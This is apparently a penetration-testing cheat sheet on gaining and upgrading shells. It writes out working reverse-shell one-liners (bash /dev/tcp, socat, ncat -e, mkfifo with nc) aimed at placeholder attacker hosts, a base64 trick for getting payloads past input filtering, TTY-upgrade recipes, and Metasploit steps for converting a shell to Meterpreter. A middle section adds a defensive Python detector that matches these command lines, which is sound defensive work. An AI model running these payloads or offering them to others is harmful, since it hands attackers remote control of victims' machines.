# Shells

Related pages:

- [Normal Shells](https://book.hacktricks.xyz/shells/shells/linux)
- [Full TTY Shells](https://book.hacktricks.xyz/shells/shells/full-ttys)

## Bash

The classic bash-based reverse shell:

```
/bin/bash -i >& /dev/tcp/TargetIP/TargetPort 0>&1
```

**Note:** If the payload doesn't work because the redirection or ampersand characters are mangled by the vulnerable application, base64-encoding the payload often works well.

## Socat TTY Shell

This gives a full TTY shell directly, so there is no need to upgrade it afterwards. It requires socat on the victim, either installed or as a static binary.

On Kali:

```
socat file:`tty`,raw,echo=0 tcp-listen:4444
```

On the victim machine:

```
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP_ADDRESS_HERE:4444
```

Once the connection is made, you will probably want to set the terminal size (run this inside the reverse shell on the victim machine):

```
stty rows 57 cols 211
```

## Ncat

Listen on port 8001 on the attacker machine:

```
sudo nc -lnvp 8001
```

Run ncat on the victim machine:

```
ncat ATTACKER_IP_HERE 8001 -e /bin/bash
```

**Note:** The command is `ncat`, not `nc` or `netcat`. They are different programs!

## Mkfifo

`sh`-based mkfifo reverse shell:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP_HERE ATTACKER_PORT_HERE >/tmp/f
```

## Upgrading Normal Shells to TTY Shells

### Switch From ZSH To Bash

**Warning:** The upgrade steps below don't work if your attacking machine's shell is zsh!

You can temporarily switch to bash:

```
exec bash --login
```

You can confirm you're using bash with:

```
ps -p $$
```

### Upgrade the Shell Using Python

Run this in the reverse shell to upgrade it. Don't worry if your terminal looks garbled for a moment.

```
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm
```

### Upgrade the Shell Without Python

```
script -qc "/bin/bash -i" /dev/null
CTRL+Z
stty raw -echo
fg
export TERM=xterm
```
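The commands in the Bash, Socat, Ncat and Mkfifo sections, and the two TTY-upgrade recipes above, all leave distinctive process command lines. The following is an added example of how a defender would turn them into triage signatures over process-creation telemetry; it is not code from this page, from HackTricks or from the leet-sheet project. The signature names, regexes, the `(pid, cmdline)` event shape and the sample events (the page's commands with RFC 1918 addresses filled in, plus two benign lines) are all this example's own constructions. It also handles the base64-wrapping case the Bash note mentions: a command that pipes into `base64 -d` is decoded and re-scanned, so the hidden payload is still matched.

```python
import base64
import re

# Added example: command-line signatures for the reverse-shell and TTY-upgrade
# techniques on this page. Names and patterns are this example's own choices;
# they are triage signals for process-creation telemetry, not proof of compromise.
SIGNATURES = {
    "bash_dev_tcp":   re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/[^/\s]+"),
    "socat_exec_pty": re.compile(r"""\bsocat\b.*\bexec:['"]?\S*?(?:ba)?sh\b.*\bpty\b""", re.I),
    "nc_exec":        re.compile(r"\b(?:ncat|nc|netcat)\b.*\s-e\s+\S*?(?:ba)?sh\b"),
    "mkfifo_pipe":    re.compile(r"\bmkfifo\b.*\|\s*(?:ncat|nc|netcat)\b"),
    "pty_spawn":      re.compile(r"\bpty\.spawn\("),
    "script_tty":     re.compile(r"""\bscript\b.*\s-q?c\s+['"]?\S*?(?:ba)?sh\b"""),
}

# A command line that feeds `base64 -d` / `--decode` may hide the real payload
# (the page notes base64 wrapping is used when redirection characters get mangled).
B64_DECODE = re.compile(r"\bbase64\s+(?:-d|--decode)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decoded_base64_payloads(cmdline):
    """Return the printable text of every base64 token in a command line that
    pipes through base64 -d; tokens that are not valid base64/UTF-8 are skipped."""
    if not B64_DECODE.search(cmdline):
        return []
    payloads = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8").strip()
        except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
            continue
        if text and text.isprintable():
            payloads.append(text)
    return payloads


def scan_cmdline(cmdline):
    """Names of the signatures matching one command line. Matches found only
    after base64-decoding an embedded payload are prefixed with 'b64:'."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(cmdline)]
    for payload in decoded_base64_payloads(cmdline):
        hits += ["b64:" + name for name, rx in SIGNATURES.items() if rx.search(payload)]
    return hits


def scan_events(events):
    """events: iterable of (pid, cmdline) pairs, e.g. from auditd execve records.
    Returns [(pid, hits)] for flagged processes only."""
    flagged = []
    for pid, cmdline in events:
        hits = scan_cmdline(cmdline)
        if hits:
            flagged.append((pid, hits))
    return flagged


# Constructed sample telemetry: the page's commands with placeholder IPs filled in
# with RFC 1918 addresses, plus two benign lines that must not fire.
_B64_PAYLOAD = base64.b64encode(b"bash -i >& /dev/tcp/10.0.0.5/4444 0>&1").decode()
SAMPLE_EVENTS = [
    (4101, "/bin/bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"),
    (4102, "./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.5:4444"),
    (4103, "ncat 10.0.0.5 8001 -e /bin/bash"),
    (4104, "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 9001 >/tmp/f"),
    (4105, "python -c 'import pty;pty.spawn(\"/bin/bash\")'"),
    (4106, 'script -qc "/bin/bash -i" /dev/null'),
    (4107, f"echo {_B64_PAYLOAD} | base64 -d | bash"),
    (4108, "nc -lnvp 8001"),                     # plain listener, no -e: benign
    (4109, "tar czf /tmp/backup.tgz /var/www"),  # ordinary admin activity
]

if __name__ == "__main__":
    for pid, hits in scan_events(SAMPLE_EVENTS):
        print(f"pid {pid}: {', '.join(hits)}")
```

The patterns are intentionally loose about binary paths and whitespace, so treat a hit as a reason to pull the parent process, the user and the network connections for that PID rather than as a verdict on its own; the listener line (`nc -lnvp`) is deliberately left unflagged because listening is not what distinguishes a reverse shell, the `-e` to a shell is.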

## Upgrading Normal Shells to Meterpreter

Run `msfconsole`. Create a listener using `multi/handler`:

```
use exploit/multi/handler
set lhost YOUR_IP_ADDRESS
set lport 4444
run
```

Then use one of the reverse shells above to connect to the listener. Once you have the shell, press `CTRL + Z` to background the session. Note the **session number** it prints; you will need it next.

Next:

```
use post/multi/manage/shell_to_meterpreter
set session SESSION_NUMBER
run
```

Once the upgrade finishes, you'll be able to see your new session:

```
sessions -l
```

*Note: There's a long-standing bug where it seems to get stuck on "Stopping exploit/multi/handler". Just press Enter; it isn't actually stuck.*

Interact with the new session with:

```
sessions -i NEW_SESSION_NUMBER
```
